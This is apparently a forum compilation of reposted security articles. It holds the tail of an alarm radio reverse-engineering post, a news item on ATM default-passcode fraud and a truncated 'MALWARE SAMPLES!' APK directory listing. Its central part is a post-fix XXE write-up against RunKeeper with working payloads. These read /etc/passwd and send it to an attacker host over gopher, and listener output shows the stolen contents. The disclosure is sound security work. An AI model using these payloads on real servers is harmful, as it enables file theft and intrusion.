0: break; frame = flowgraph.myqueue.delete_head_nowait().to_string() dump_frame(frame, aes_iv, aes_key) # I can't exit the script because of a blocking call to "myqueue.delete_head()". So for now.. sleep(0.1) print "[%s] Exiting" % (get_time()) # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 Here is the final output: A few comments about the output. Briefly: In yellow: the length of the packet In blue: still unclear but it appears to be related to payload encryption (encrypted or not, has padding or not, …) In grey (and gray): a kind of sequence number In green: the source ID of the packet In red: the destination ID of the packet In pink: the payload 5. Final note The reader has probably observed from the output of the script that an AES-128 key is provided and that payloads are decrypted. The way we recovered the key will be discussed later on. Don’t try this key at home since keys are randomly generated by the VBox. GNURadio flowgraph and python script can be downloaded from https://github.com/funoverip/verisure-alarm. Prerequisite: I’ve used HackRF One as SDR platform but any other SDR device should make the trick. You will need GNURadio 3.7 or above Do not forget to also install the GNURadio gr-cc1111 blocks ! Last but not least, a big thank you to Michael Ossmann for his awesome SDR class. Strongly recommended! Hope you enjoyed this post… Regards. Sursa: Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications | Fun Over IP

Identifying Xml eXternal Entity vulnerability (XXE) Here is a small writeup on how a XXE was discover on the website RunKeeper.com. The website, as the name suggest, keep track of your trainings (running, cycling, skying, etc.) The vulnerabilities presented were fixed on June 10th 2014. The website accept the upload of GPX file. The GPX file format is a XML document containing a list of positions with the instant speed, time and elevation. GPX file Here is an example of GPS file in the GPX format. The only important aspect is that it is XML based. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19[/TD] [TD=class: code]<gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format"> <time>2014-06-07T20:04:44.453Z</time> <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487"> <trk> <trkseg> <trkpt lat="35.460997739" lon="-73.568049331"> <ele>22.600000</ele> <time>2014-06-07T18:06:16Z</time> <speed>0.000000</speed> </trkpt> <trkpt lat="35.460997655" lon="-73.568049163"> <ele>22.600000</ele> <time>2014-06-07T18:06:16Z</time> <speed>0.000000</speed> </trkpt> [...] </trkseg></trk> </bounds></gpx>[/TD] [/TR] [/TABLE] Attack potential When seeing user XML being parse server-side, the first thing that come to mind should be XXE attacks. XXE stands for Xml eXternal Entity. These attacks have gain momentum recently following various publications. Note that the current article doesn't explain in dept XXE. It focus on tips and methodology to identify the vulnerability and the parser capabilities. The tests presented are those that were effective on the old version of RunKeeper. Step 1 : Confirmation that entities are interpreted In our first attempt, we need to confirm that entity are interpreted in there most basic form. We replace value with an inline entity. If it loads properly, then the replacement must have occurs. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13[/TD] [TD=class: code]<!DOCTYPE foo [<!ENTITY xxe "35.460997739" > ]> <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format"> <time>2014-06-07T20:04:44.453Z</time> <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487"> <trk> <trkseg> <trkpt lat="&xxe;" lon="-73.568049331"> <ele>22.600000</ele> <time>2014-06-07T18:06:16Z</time> <speed>0.000000</speed> </trkpt> </trkseg></trk> </bounds></gpx>[/TD] [/TR] [/TABLE] Step 2 : Confirmation that SYSTEM entities are usable We can now try loading external resources from a host we control. The resources can be hosted on a HTTP server, FTP server or even Samba shares in the case of intranet application. RunKeeper only look at position, time and other numeric values. The string values from the metadata are not used. Therefore, it is not possible to get a direct response after the upload of a GPX file. If the destination is a server we control, we would receive a connection if external entities are activated. Assuming a strict firewall restrictions is in place, all common ports should be tested (23, 80, 443, 8080, ...). evil.gpx [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15[/TD] [TD=class: code]<!DOCTYPE foo [<!ENTITY xxe SYSTEM "I'm Feeling Lucky" > ]> <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format"> <desc>&xxe;</desc> <time>2014-06-07T20:04:44.453Z</time> <bounds maxlat="35.461644151" maxlon="-73.562228351" minlat="35.437931663" minlon="-73.610299487"> <trk> <trkseg> <trkpt lat="35.460997739" lon="-73.568049331"> <ele>22.600000</ele> <time>2014-06-07T18:06:16Z</time> <speed>0.000000</speed> </trkpt> </trkseg></trk> </bounds> </gpx>[/TD] [/TR] [/TABLE] Right after the upload, our server receive the following request. SYSTEM entities are now confirm. [TABLE] [TR] [TD=class: code]74.50.53.234 - - [08/Jun/2014:00:36:55 -0400] "GET /ping_me HTTP/1.1" 200 77 "-" "Java/1.6.0_26"[/TD] [/TR] [/TABLE] Step 3 : Test for external DTD availability to exfiltrate data A cool trick was discovered by the researchers that allow the construction of URL with data coming from other entities.evil1.gpx [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///etc/issue"> <!ENTITY % dtd SYSTEM "I'm Feeling Lucky"> %dtd;]> <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format"> <desc>&send;</desc> [....] </gpx>[/TD] [/TR] [/TABLE] I'm Feeling Lucky [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'I'm Feeling Lucky'>"> %all;[/TD] [/TR] [/TABLE] Following the upload, we then received the following request: [TABLE] [TR] [TD=class: code]74.50.62.56 - - [08/Jun/2014:00:51:41 -0400] "GET /content?Debian GNU/Linux 7 \x5Cn \x5Cl HTTP/1.1" 200 251 "-" "Java/1.6.0_26"[/TD] [/TR] [/TABLE] In pratice, the previoust technique is not perfect. Any file with XML incompatible characters (&, \n, \x80, etc) would break the URL. The /etc/issue is one of the rare file safe to include. Step 4 : Test for external DTD with gopher protocol We still have an option to fetch arbitrary file. A good observer would have notice that the remote JVM version was capture on step 1. The version is Java 1.6 update 26. The gopher protocol was disable on version 1.6 update 37 [Ref].The gopher protocol can be use to open a TCP connection and send arbitrary data. [TABLE] [TR] [TD=class: code]gopher://remote_host:remote_port/?ARBITRARY_DATA[/TD] [/TR] [/TABLE] evil2.gpx [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "I'm Feeling Lucky"> %dtd;]> <gpx creator="EliteGPS" version="1.0" xmlns="GPX: the GPS Exchange Format"> <desc>&send;</desc> [....] </gpx>[/TD] [/TR] [/TABLE] I'm Feeling Lucky [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'gopher://xxe.me:1337/xxe?%file;'>"> %all;[/TD] [/TR] [/TABLE] Following the upload of the first file, an incoming connection is open and the file content is received. [TABLE] [TR] [TD=class: code]$ nc -nlvk 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from [74.50.53.234] port 1337 [tcp/*] accepted (family 2, sport 42321) xe?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh [...][/TD] [/TR] [/TABLE] Files can be fetch and directory can be list. For example, the entity "file:///" will return the root directory: [TABLE] [TR] [TD=class: code]$ nc -nlvk 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from [74.50.58.179] port 1337 [tcp/*] accepted (family 2, sport 52827) xe?.rpmdb .ssh bin boot dev etc home initrd.img lib lib32 lib64 lost+found media mnt opt proc root sbin selinux [...][/TD] [/TR] [/TABLE] Demonstration Demonstration of the attacks described previously. (Fullscreen recommended) Mitigations To resolve this issue two changes needed to be applied. SYSTEM entities were disable for the parsing of GPX files. Also, the Java Virtual Machine was updated to benefit from the previous security updates including the gopher protocol being disable by default. References : Presentation by Nicolas Grégoire at HackInTheBox 2012 : Presentation by Timothy Morgan at AppSecUSA 2013 Compromising an unreachable Solr server with CVE-2013-6397: Vulnerability found by Nicolas Grégoire XML Schema, DTD, and Entity Attacks: Excellent reference on the attack variations written by Timothy D. Morgan (Virtual Security Research) : Presentation by Alexey Osipov and Timur Yunusov at BlackHat USA 2013 XXE OOB exploitation at Java 1.7+: Alternative method to exfiltrate data without the gopher protocol presented by Ivan Novikov. Posted by Philippe Arteau at 11:35 AM Sursa: h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE)

Default ATM passcodes still exploited by crooks Posted on 14 November 2014. Once again, ATMs have been "hacked" by individuals taking advantage of default, factory-set passcodes. This time the passcode hasn't been guessed, or ended up online for everyone to know because it was printed in the ATM's service manual - the individual who, with the help of an accomplice, managed to cash out $400,000 in 18 months was a former employee of the company that operated the kiosk ATMs they targeted. Tennessee-based Khaled Abdel Fattah had insider knowledge of the code that, when typed in, set the machines into Operator Mode, which allowed him and accomplice Chris Folad to reconfigure the ATM to dispense $20 bills when asked for $1 dollar ones. They would do this, then ask the machine to dispense, for example, $20, and they would get away with $400. After this, they would revert back the change so that the theft would go unnoticed. And it took 18 months for this to happen - the owner of one the businesses where one of these kiosk ATMs was set up noted that there was a problem when the machine was running out of money. What ultimately led the Secret Service to the two fraudsters was the fact that their faces were captured by surveillance cameras and they used their own debit cards to make withdrawals. They also stuck to a rather limited set of ATMs, all located in Nashville. According to Wired, both men have been charged with 30 counts of computer fraud and conspiracy. This is not the first time that ATM heists like this happened. Around 2005, service manuals of ATMs manufactured by Tranax and Trident ended up online, and contained the passcodes that allowed anyone to access their Operator Mode. Street crooks began taking advantage of the fact, but it took over 18 months for the wider public to discover it. This forced the ATM vendors in question to make it mandatory for operators to change this default password when installing the machine. But unfortunately, there are many ATMs with the old system still out there, and still vulnerable. Sursa: Default ATM passcodes still exploited by crooks

MALWARE SAMPLES! [TABLE] [TR] [TD][/TD] [TD]!getril.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]827K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD](??????).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]186K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD](??)_2.4.2.2.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]2.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD])>.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]762K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]-??-06233.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]303K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]--¦n¦p¦t-n++¦µ.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 11M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]-5.6.1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]5.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]-KonTour_Universe_2.0.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]586K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0B5yTJYKn2cFGeHJiaTlNNWJ5elk.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 13M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0D28FA54F9C0D41801E8FB5A7B0433DD.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]225K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0aafeba54231814518593b6ef588a54c.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]1.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0b6aa20c09b7e1b6c14154fd5c667276.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]954K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0b20e606c327915f82e2744d3b33ff70.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]6.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0b43ce26e3d71472de357ab4b1e3aa0b94d9f445.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]772K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0cc55f6bf9329f3c5e3c11a42caafcf65f98ad59a6a92ecfc8498b6987574925.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]110K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0va1s.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]00b65a502bcb79a9f516c3aa8703a50f.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]6.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]00c154b42fd483196d303618582420b89cedbf46.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]586K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]0274a66cd43a39151c39b6c940cf99b459344e3a.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]4.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]06eb19d137ff0a0ccd778b236e8d45c3b9b078115b2ed69baf06aee0244980c1.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]478K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]06f3b82f301c97b2da71f4fdc8ed0e6046381981581dbf7714511abca47d3387.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]947K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]08170-Caveman-Run-v.1.0.6.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 12M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]569K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1 Click Direction (1.2.9).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]179K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1Framaroot-1.6.1.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]908K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1_com.jordangoierri.plantilla.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]2.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1b980ea6ef0e2c2c5b3f92036d5e2624f4f5e312ecd2c3755c65caa7af1425b8.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]231K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1be67a22077b65d6f2f6d2e8855c43d1803e35ebd982f7aa06a4c45dd5dea5cc.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]317K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1df2c9af1bfd8093023afb212926b689e3b3a1dabb60ca2a7d627c602eea83a8.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]217K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1gb.ru-1.0.20-1408030426.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]520K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2.1.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]8.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 12M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2caner.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 22K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2xBatteryPro-BatterySaverv2.91apkmania.com.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]3.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_MAVEN_Music_Player_Pro_1_12_65.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]5.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3a37618573de905337f3ef372863ba7dccd4adc03e41eb46c2033099c2325901.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]311K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3af3e5df527a8df1c7dc18b6fb6a4f6430dcb64665942dea83e77d2c5a32852d.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3cb3a04b13ac22b5503b32209dbd288809bd1c29b32e06bbf3fd433da8f70ecb.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]1.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3f3tt34tgdsvs.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]178K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]4PlayerReactor.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]4bebdaa1b0b82d497f0e1a172779c073f8d24b44b588c152493400b1c0f63bf5.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]149K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]4g55h.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]1.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]5.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6e9848008c42128623d1077f0cc75c0861e2b3d0fb76e68c5fc9ec8f69361572.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6ea6a44433e321d81fea8fd2c91d5f7d71f57136b979cc85dac90ab5f8f7b070.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]112K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6eb2a685bc4fa7b825fe7e40d1b4263bb38f3dc01f91a578ab9c75049fc4054f.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6eb9e5b879ab3088872a755b86ae6f928df3927fdbab30ab0d7a8469902c3779.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]698K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6eb51ab4443b237ffdfee833801b39a41e5b6f67d70e38193d96bb61472a4c14.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]4.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6ec9c3033b2051d18762eca6116aec2bf1279360ea358256282da71e1c87eb13.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 76K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6ed52331a788ef18727c8e34746b59db81acdb261659934be63b0266fb7c19e7.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f1af02b1836ac348e90b0ac69cd57f1f396b9b1d886be1b007af1b6a5b7008d.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f2e2f2bac1438cd088de25bb34c6dea20b41ac7756df397e661013664d56d95.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f3bdc06a6148f184a45bd42a90a5e018ea5d1eddb65bd408c424246fd61233b.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]3.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f3ff062c0a4ca13a12c68fb3fc17a12f75bd18ba6cb76cc82660f026a966990.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]3.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f4d28a17226911cc4cf61502ad6b2ccc1686ec19e83149c609c153c6cc3ee7e.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]3.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f5c03106c784fa468a0fab348cf73934dfe0db68428ff8f9a55657bb31cb056.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]2.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]6f5cff74185ba9bdbc9333c1b025371cd2d109a76fc953f2212f19b9481258e8.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]508K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]7net.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]8fh4oc??.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]126K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9.6.29.326419fullscreenHDByCatalflex.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]6.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9.6.29.341779_ANS_final+.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]6.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9_appinventor.ai_designsandroid.Horarios_Renfe_1.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]1.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9a049a19f35e736bc408edb6bb80dd1623ccd3365fed9aa3e5eca341a89c0901.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]705K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9b88bbfc71fe89ae580db09ac750e00e4e93787b83aaed6b919ccc3f364d0d4c.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]135K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]9f3a50de2e3ffbd49b0157091feba812.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 63K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]10_com.flappy.flappydoge.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]1.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]20F048DFED44B43F905379CB12D4FC91.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]381K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]23.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]30_Day_Fitness_2.2.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 18M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]32.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 40K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]39e1c05b3541f249a7714af72999492a5a813ef67c80647e4b1b286975c36b9f.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]131K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]40f1146e35096e44dab5276d21e7e2e35632053e.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]108K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]46_PY-batr-2C5.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]1.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]71bdbfcaca7c106f1b596bc53a1ddcd909e05331e412ed00ca0753441dc2bbad.bin.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]320K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]72ab84bf406504de10ed0f0ae41aa08e.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]159K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]80a101a2d0e1f53724159113d6e8fe2f.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]967K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]83c6414c9c7964f4fb88e0d2477c20e4.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]2.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]98aac4b0-b70e-43af-91e6-c298969862ee_item.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]149K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]111.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 61K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]115_android_v4.0.0.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]9.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]170sam_40_samsung_I5510_en_ar_tr_signed20101014.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]495K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]190.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 37K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]255ede5235739c2adde33ce8d022355633287356210080f746a3a4b83d98c910.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]213K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]333.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]9.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]347_???.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]481K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]360_Clean_Droid_2_0_3_www.AndroidHa.com.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]3.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]360browser_phone.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]5.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]421and.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]135K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]428.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]106K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]436_Robird_2_0_1.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]1.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]444.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]500_Firepaper_1_04.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]140K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]500px_Inspiring_Photos_2_1.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]615fe78f3a644cb63df8b7918fb8d503SMS_Replicator_Secret.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 62K[/TD] [TD] 